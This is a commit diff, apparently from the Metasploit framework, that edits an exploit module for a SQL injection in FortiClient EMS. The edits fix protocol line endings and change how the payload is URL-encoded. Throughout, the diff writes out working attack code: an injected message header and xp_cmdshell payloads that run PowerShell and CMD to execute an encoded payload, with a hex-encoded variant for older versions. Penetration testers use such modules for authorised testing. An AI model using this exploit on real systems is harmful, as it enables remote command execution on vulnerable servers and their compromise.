Responded to comments

jheysel-r7 · jheysel-r7 · commit 2ffe027eab21 · 2024-07-25T09:14:27.000-07:00
diff --git a/modules/exploits/windows/http/forticlient_ems_fctid_sqli.rb b/modules/exploits/windows/http/forticlient_ems_fctid_sqli.rb
@@ -203,13 +203,13 @@ def get_version
 
   def get_message(sqli)
     message = "MSG_HEADER: FCTUID={SQLI_PLACEHOLDER}\n"
-    message << "SIZE=     {SIZE_PLACEHOLDER}\n\r"
+    message << "SIZE=     {SIZE_PLACEHOLDER}\r\n"
     message << "\n"
     # For 7.0 versions the register info gets placed after two pipe operators, for 7.2 it gets placed in between.
     if @version >= Rex::Version.new('7.2')
       message << "X-FCCK-REGISTER:SYSINFO|#{get_register_info}|\r\n"
     else
-      message << "X-FCCK-REGISTER: SYSINFO||#{get_register_info}\n"
+      message << "X-FCCK-REGISTER:SYSINFO||#{get_register_info}\r\n"
     end
     message << "\n"
     message << 'X-FCCK-REGISTER-END'
@@ -249,10 +249,6 @@ def check
     CheckCode::Safe("Version detected: #{@version}")
   end
 
-  def fully_url_encode(string)
-    string.chars.map { |char| '%' + char.ord.to_s(16).upcase }.join
-  end
-
   def exploit
     # Things to note:
     # 1. xp_cmdshell is disabled by default so we must enable it.
@@ -265,7 +261,7 @@ def exploit
     @version ||= get_version
 
     if @version >= Rex::Version.new('7.2')
-      pload = "EXEC xp_cmdshell 'POWERSHELL.EXE -COMMAND \"\"Add-Type -AssemblyName System.Web; CMD.EXE /C ([SYSTEM.WEB.HTTPUTILITY]::URLDECODE(\"\"\"#{fully_url_encode(payload.encoded)}\"\"\"))\"\"'"
+      pload = "EXEC xp_cmdshell 'POWERSHELL.EXE -COMMAND \"\"Add-Type -AssemblyName System.Web; CMD.EXE /C ([SYSTEM.WEB.HTTPUTILITY]::URLDECODE(\"\"\"#{Rex::Text.uri_encode(payload.encoded, 'hex-all')}\"\"\"))\"\"'"
     else
       pload = "DECLARE @SQL VARCHAR(#{payload.encoded.length}) = CONVERT(VARCHAR(MAX), 0X#{payload.encoded.unpack('H*').first}); exec xp_cmdshell @sql"
     end
